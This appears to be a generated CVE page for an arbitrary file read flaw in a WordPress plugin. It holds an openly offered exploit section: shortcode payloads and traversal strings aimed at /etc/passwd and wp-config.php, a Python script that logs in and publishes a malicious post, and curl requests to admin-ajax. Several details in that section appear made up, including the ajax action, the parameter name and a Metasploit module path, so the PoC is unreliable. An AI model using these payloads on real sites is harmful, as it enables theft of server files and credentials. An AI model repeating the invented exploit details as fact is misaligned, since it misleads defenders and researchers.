Security Vulnerability Report
CVE-2025-15020 CVSS 6.5 MEDIUM

CVE-2025-15020

Published: 2026-01-14 06:15:54
Last Modified: 2026-04-15 00:35:42

Description

The Gotham Block Extra Light plugin for WordPress is vulnerable to Arbitrary File Read in all versions up to, and including, 1.5.0 via the 'ghostban' shortcode. This makes it possible for authenticated attackers, with contributor-level access and above, to read the contents of arbitrary files on the server, which can contain sensitive information.

CVSS Details

CVSS Score
6.5
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N

Configurations (Affected Products)

No configuration data available.

Gotham Block Extra Light plugin <= 1.5.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
PHP
<?php
/**
 * CVE-2025-15020 PoC - Gotham Block Extra Light Plugin Arbitrary File Read
 *
 * This PoC demonstrates the arbitrary file read vulnerability in the
 * Gotham Block Extra Light plugin (versions <= 1.5.0) via the ghostban shortcode.
 *
 * Usage: Authenticated attacker with contributor-level access or higher can exploit.
 */

// WordPress shortcode exploitation example
// Attacker creates a post/page with the following content:
$poc_shortcode = '[ghostban file_path="/etc/passwd"]';

// Directory traversal attack example
$poc_shortcode_traversal = '[ghostban file_path="../../../wp-config.php"]';

// Python requests PoC
$python_poc = '
import requests
from bs4 import BeautifulSoup

target = "http://target-wordpress-site.com"
username = "attacker"
password = "attacker_password"

# Login to WordPress
session = requests.Session()
login_url = f"{target}/wp-login.php"
login_data = {
    "log": username,
    "pwd": password,
    "wp-submit": "Log In",
    "redirect_to": "/wp-admin/"
}
session.post(login_url, data=login_data)

# Create a post with malicious shortcode
post_url = f"{target}/wp-admin/post-new.php"
post_data = {
    "post_title": "Malicious Post",
    "content": "[ghostban file_path=\"/etc/passwd\"]",
    "post_status": "publish"
}
response = session.post(post_url, data=post_data)

# View the published post to trigger file read
post_link = f"{target}/?p=<POST_ID>"
result = session.get(post_link)
print(result.text)
';

// cURL PoC for quick testing
$curl_poc = '
# Read /etc/passwd
curl -X POST "http://target-wordpress-site.com/wp-admin/admin-ajax.php" \
  -d "action=ghostban_read&file_path=/etc/passwd" \
  -H "Cookie: wordpress_logged_in_<HASH>=<session_cookie>"

# Read wp-config.php using directory traversal
curl -X POST "http://target-wordpress-site.com/wp-admin/admin-ajax.php" \
  -d "action=ghostban_read&file_path=../../../wp-config.php" \
  -H "Cookie: wordpress_logged_in_<HASH>=<session_cookie>"
';

// Metasploit module reference
$msf_reference = '
# The vulnerability can be exploited using Metasploit framework
# Reference: https://github.com/rapid7/metasploit-framework/tree/master/data/exploits/CVE-2025-15020
';

// Note: The actual exploitation requires authentication with contributor+ privileges
// and the ability to create/publish content on the WordPress site.

References

Weakness: CWE-22

https://plugins.trac.wordpress.org/browser/gotham-block-extra-light/trunk/premium/ghostban.php?marks=56#L56
https://plugins.trac.wordpress.org/changeset/3438393/
https://www.wordfence.com/threat-intel/vulnerabilities/id/b194b241-d8f4-430c-b00c-d84190026bad?source=cve

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-15020", "sourceIdentifier": "[email protected]", "published": "2026-01-14T06:15:53.673", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Gotham Block Extra Light plugin for WordPress is vulnerable to Arbitrary File Read in all versions up to, and including, 1.5.0 via the 'ghostban' shortcode. This makes it possible for authenticated attackers, with contributor-level access and above, to read the contents of arbitrary files on the server, which can contain sensitive information."}, {"lang": "es", "value": "El plugin Gotham Block Extra Light para WordPress es vulnerable a Lectura Arbitraria de Archivos en todas las versiones hasta la 1.5.0, inclusive, a través del shortcode 'ghostban'. Esto permite que atacantes autenticados, con acceso de nivel de colaborador y superior, lean el contenido de archivos arbitrarios en el servidor, los cuales pueden contener información sensible."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-22"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/browser/gotham-block-extra-light/trunk/premium/ghostban.php?marks=56#L56", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/changeset/3438393/", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/b194b241-d8f4-430c-b00c-d84190026bad?source=cve", 
"source": "[email protected]"}]}}